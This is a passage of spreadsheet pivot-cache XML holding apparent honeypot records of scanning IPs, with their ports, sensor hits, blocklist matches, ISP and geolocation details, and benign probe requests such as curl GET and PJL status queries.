    <d v="2024-03-20T03:42:08"/>
    <d v="2025-04-15T02:10:32"/>
    <n v="765"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H22"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22563&amp;&amp;23&amp;&amp;NA&amp;&amp;80&amp;&amp;9100"/>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NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc86:44e3"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1736"/>
    <x v="1736"/>
    <s v="220-132-142-26.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-15T02:10:32"/>
    <d v="2024-05-13T02:33:34"/>
    <d v="2025-04-15T02:10:32"/>
    <n v="448"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H25"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;50184&amp;&amp;23&amp;&amp;9100&amp;&amp;80&amp;&amp;30587&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login&amp;&amp;connection&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc84:8e1a"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1737"/>
    <x v="1737"/>
    <s v="c87-227-112-132.bredband.tele2.se&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-15T01:59:19"/>
    <d v="2025-04-15T01:55:05"/>
    <d v="2025-04-15T01:59:19"/>
    <n v="7"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="SE"/>
    <s v="Sweden"/>
    <s v="AB"/>
    <s v="Stockholm"/>
    <s v="Stockholm Municipality"/>
    <s v="Stockholm"/>
    <s v="2673730"/>
    <s v="100 04"/>
    <s v="59.3293"/>
    <s v="18.0686"/>
    <s v="1257"/>
    <s v="Tele2 Sverige AB"/>
    <s v="Tele2 Sverige AB"/>
    <s v="residential"/>
    <s v="Tele2 Business AB"/>
    <s v="2005-07-06"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="1991-04-14 00:00:00"/>
    <s v="2025-12-31 00:00:00"/>
    <s v="2024-12-01 00:00:00"/>
    <s v="['pitea.dns.swip.net', 'sunic.sunet.se', 'ystad.dns.swip.net', 'c.dns.tele2.net']"/>
    <s v="www.NameSRS.com"/>
    <s v="ok"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:57e3:7084"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1738"/>
    <x v="1738"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T01:49:52"/>
    <d v="2023-07-28T07:15:32"/>
    <d v="2025-04-15T01:49:52"/>
    <n v="10"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_SSH_H25&amp;&amp;SMA-LAB_SMB_H34&amp;&amp;SMA-LAB_SOCKS5_H22&amp;&amp;SMA-LAB_DNS_H13&amp;&amp;SMA-LAB_HTTPS_H2&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_LDAP_H37&amp;&amp;SMA-LAB_NTP_H15&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="22&amp;&amp;445&amp;&amp;1080&amp;&amp;53&amp;&amp;443&amp;&amp;80&amp;&amp;389&amp;&amp;123&amp;&amp;1557&amp;&amp;1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Madurai"/>
    <s v="Madurai"/>
    <s v="1264521"/>
    <s v="625016"/>
    <s v="9.93593"/>
    <s v="78.0968"/>
    <s v="141314"/>
    <s v="Wi5 Internet Services Private Limited"/>
    <s v="Wi5 Internet Services Private Limited"/>
    <s v="business"/>
    <s v="Wi5  Private Limited"/>
    <s v="2017-03-07"/>
    <s v="WI5INTERNET"/>
    <s v="None"/>
    <s v="None&amp;&amp;connection&amp;&amp;login"/>
    <s v="None&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6757:6aa6"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1739"/>
    <x v="1739"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T01:23:15"/>
    <d v="2025-04-15T01:23:15"/>
    <d v="2025-04-15T01:23:15"/>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b:c839"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1740"/>
    <x v="1740"/>
    <s v="NA&amp;&amp;host-81-178-180-8.as13285.net"/>
    <x v="0"/>
    <d v="2025-04-15T01:18:21"/>
    <d v="2025-04-14T15:15:05"/>
    <d v="2025-04-15T01:18:21"/>
    <n v="24"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="GB"/>
    <s v="United Kingdom"/>
    <s v="ENG"/>
    <s v="England"/>
    <s v="Warwickshire"/>
    <s v="Southam"/>
    <s v="2637488"/>
    <s v="NA"/>
    <s v="52.2527"/>
    <s v="-1.3884"/>
    <s v="9105"/>
    <s v="TalkTalk Communications Limited"/>
    <s v="TalkTalk"/>
    <s v="residential"/>
    <s v="TalkTalk Communications Limited"/>
    <s v="2003-01-29"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2007-05-17 08:57:53"/>
    <s v="2025-05-17 08:57:53"/>
    <s v="2024-05-13 05:12:38"/>
    <s v="['DS0.OPALTELECOM.NET', 'DS1.OPALTELECOM.NET', 'DS2.OPALTELECOM.NET']"/>
    <s v="CSC Corporate Domains, Inc."/>
    <s v="['clientTransferProhibited https://icann.org/epp#clientTransferProhibited', 'clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited']"/>
    <s v="Domain Administrator"/>
    <x v="28"/>
    <s v="NA"/>
    <s v="Soapworks,Ordsall Lane"/>
    <s v="::ffff:51b2:b408"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1741"/>
    <x v="1741"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T01:13:55"/>
    <d v="2025-03-02T16:05:18"/>
    <d v="2025-04-15T01:13:55"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75cf:aae6"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1742"/>
    <x v="1742"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T00:47:33"/>
    <d v="2025-04-15T00:47:33"/>
    <d v="2025-04-15T00:47:33"/>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dd:d96b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1743"/>
    <x v="1743"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T00:42:19"/>
    <d v="2025-03-29T10:01:07"/>
    <d v="2025-04-15T00:42:19"/>
    <n v="9"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H27"/>
    <s v="23&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TR"/>
    <s v="Turkey"/>
    <s v="21"/>
    <s v="Diyarbakır Province"/>
    <s v="NA"/>
    <s v="Diyarbakır"/>
    <s v="316541"/>
    <s v="NA"/>
    <s v="37.925"/>
    <s v="40.211"/>
    <s v="47331"/>
    <s v="TTNet A.S."/>
    <s v="TurkTelecom"/>
    <s v="residential"/>
    <s v="Turk Telekomunikasyon A.S"/>
    <s v="2007-05-01"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:4ebb:ea89"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1744"/>
    <x v="1744"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T00:39:29"/>
    <d v="2024-12-05T03:04:06"/>
    <d v="2025-04-15T00:39:29"/>
    <n v="191"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_SOCKS5_H41&amp;&amp;SMA-LAB_PJL_H41&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_IMAP_H21&amp;&amp;SMA-LAB_FTP_HC1&amp;&amp;SMA-LAB_SOCKS5_H21&amp;&amp;SMA-LAB_MSSQL_H21&amp;&amp;SMA-LAB_POP3_H11&amp;&amp;SMA-LAB_PJL_H11&amp;&amp;SMA-LAB_FTP_H11&amp;&amp;SMA-LAB_POSTGRES_H11&amp;&amp;SMA-LAB_IRC_H11&amp;&amp;SMA-LAB_HTTPS_H11&amp;&amp;SMA-LAB_SOCKS5_H11&amp;&amp;SMA-LAB_PJL_HC1&amp;&amp;SMA-LAB_REDIS_H14&amp;&amp;SMA-LAB_SMB_H14&amp;&amp;SMA-LAB_IMAP_H40&amp;&amp;SMA-LAB_PJL_H14&amp;&amp;SMA-LAB_IMAP_H14&amp;&amp;SMA-LAB_ORACLE_H14&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_REDIS_H9&amp;&amp;SMA-LAB_SOCKS5_H40&amp;&amp;SMA-LAB_LDAP_H9&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_HTTPS_H21&amp;&amp;SMA-LAB_PJL_H19&amp;&amp;SMA-LAB_RDP_H19&amp;&amp;SMA-LAB_MSSQL_H19&amp;&amp;SMA-LAB_IMAP_H47&amp;&amp;SMA-LAB_POP3_H47&amp;&amp;SMA-LAB_RDP_H47"/>
    <s v="5900&amp;&amp;1080&amp;&amp;9100&amp;&amp;143&amp;&amp;21&amp;&amp;1433&amp;&amp;110&amp;&amp;5432&amp;&amp;6667&amp;&amp;443&amp;&amp;6379&amp;&amp;445&amp;&amp;1521&amp;&amp;389&amp;&amp;3389&amp;&amp;3306"/>
    <s v="True"/>
    <s v="{'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']}"/>
    <n v="112"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="SG"/>
    <s v="Singapore"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="Singapore"/>
    <s v="1880252"/>
    <s v="NA"/>
    <s v="1.35208"/>
    <s v="103.82"/>
    <s v="142002"/>
    <s v="Scloud Pte Ltd"/>
    <s v="Scloud Pte Ltd"/>
    <s v="hosting"/>
    <s v="Scloud Pte Ltd"/>
    <s v="1993-06-18"/>
    <s v="SCLOUDPTELTD-SG"/>
    <s v="None"/>
    <s v="connection&amp;&amp;query&amp;&amp;login&amp;&amp;command"/>
    <s v="NA&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 103.211.202.140:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 156.244.37.11:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_SMB:Incoming connection (165.154.205.155,11986)}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:a59a:cd9b"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1745"/>
    <x v="1745"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T00:28:16"/>
    <d v="2025-04-14T17:49:21"/>
    <d v="2025-04-15T00:28:16"/>
    <n v="46"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H45"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="MY"/>
    <s v="Malaysia"/>
    <s v="14"/>
    <s v="Kuala Lumpur"/>
    <s v="WP. Kuala Lumpur"/>
    <s v="Kuala Lumpur (Kampung Attap)"/>
    <s v="1735161"/>
    <s v="50460"/>
    <s v="3.13696"/>
    <s v="101.694"/>
    <s v="4788"/>
    <s v="TM TECHNOLOGY SERVICES SDN BHD"/>
    <s v="TM TECHNOLOGY SERVICES SDN BHD"/>
    <s v="residential"/>
    <s v="Adsl Streamyx"/>
    <s v="2004-06-07"/>
    <s v="ADSL-STREAMYX"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3c31:64d0"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1746"/>
    <x v="1746"/>
    <s v="220-134-212-125.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-15T00:27:21"/>
    <d v="2024-07-17T06:38:24"/>
    <d v="2025-04-15T00:27:21"/>
    <n v="290"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H5&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H22"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;23&amp;&amp;80&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET: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dc86:d47d"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1747"/>
    <x v="1747"/>
    <s v="220-134-161-76.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-15T00:10:19"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-15T00:10:19"/>
    <n v="409"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H1&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H38"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;22310&amp;&amp;45259&amp;&amp;23&amp;&amp;9100&amp;&amp;NA&amp;&amp;80"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc86:a14c"/>
    <s v="C-I_D"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
